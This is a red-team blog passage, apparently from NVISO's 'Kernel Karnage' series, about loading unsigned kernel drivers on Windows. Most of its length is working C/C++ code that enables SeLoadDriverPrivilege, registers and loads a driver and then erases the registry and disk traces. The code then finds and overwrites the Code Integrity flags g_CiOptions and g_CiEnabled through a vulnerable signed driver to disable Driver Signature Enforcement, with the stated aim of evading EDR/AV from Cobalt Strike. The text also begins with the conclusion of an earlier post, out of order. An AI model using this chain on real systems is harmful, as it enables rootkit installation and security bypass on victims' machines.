What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct though, because there are ways to manually map drivers into memory, however they come with a lot of drawbacks like:

  • Invalid DeviceObject and RegistryPath objects
  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much details here, but manually mapping comes with so much overhead and instability it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291 which will also be integrated in my CobaltWhispers framework for Cobalt Strike, which I just updated to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fullfill its purpose. Writing tools wouldn’t be very useful if they don’t work outside of a lab environment and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show, most challenges to remain undetected and bypass EDR/AV are still presented in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if the time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 8 (Getting Around DSE)

10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the intergration part with CobaltWhispers which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier LUID. Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;

status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid)

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);
SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

HANDLE hKey;
ULONG disposition;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING keyName;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

UNICODE_STRING keyValueName;
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
DWORD keyValue = SERVICE_ERROR_NORMAL;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
keyValue = SERVICE_KERNEL_DRIVER;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
keyValue = SERVICE_DEMAND_START;
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
UNICODE_STRING DriverImagePath;
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

NtLoadDriver(&keyName);
//do stuff
NtUnloadDriver(&keyName);

HANDLE hKey;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtDeleteFile(&oa);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it is located in ntoskrnl.exe or CI.dll as a global non-exported variable (flag). Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, which is a global boolean variable toggling DSE either enabled or disabled. In any other more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variables in kernel memory and overwrite the value with 0x0 to disable DSE using the vulnerable driver. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. Sounds relatively straightforward you might say, however the hard part is locating g_CiEnabled or g_CiOptions, because even though we know where to go looking, they are not exported so we will need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to adjust for a single vulnerable driver, use lower level API calls, or direct syscalls and be overall more readable.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR variableAddress;
	ULONG flags = 0;

    // locate the address in memory of the DSE variable
	variableAddress = QueryVariable(buildNumber);

    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
        else
            printf("Failed to set new DSE value\n");
    }
	return status;
}

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
    }
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";
    }

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
        }
    }
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);
    }

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;
    }

    FreeLibrary(mappedImageBase);
	return result;
}

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and local mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ Header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and substracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)
		return STATUS_PROCEDURE_NOT_FOUND;

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
                    break;
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)
                break;

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,
                    offset);

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                        break;
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
                            break;
                        }
                    }
                }
            }
            offset += hs.len;
        } while (offset < 256);
	}

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)
            break;

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
                break;
            }
        }
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)
		return STATUS_UNSUCCESSFUL;

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space
    // by adding the offset and substracting the base address
    // of the locally mapped copy from the kernel module base address
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;
	return STATUS_SUCCESS;
}

QueryCiEnabled() uses a hardcoded value of 0x1D8806EB to calculate and resolve the offset.

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
			break;
		}
	}
	return status;
}

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

I’m still busy investigating the exact workings of QueryCiEnabled() and QueryCiOptions() as I would like to remove dependencies on hardcoded offsets or external libraries/tools like Hacker Disassembler Engine 64. Once this process is complete, I can move on to optimizing code for OPSEC purposes, for example implementing direct syscalls as much as possible, and then convert the final result to a Beacon Object File for Cobalt Strike.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

  • There are no more articles
❌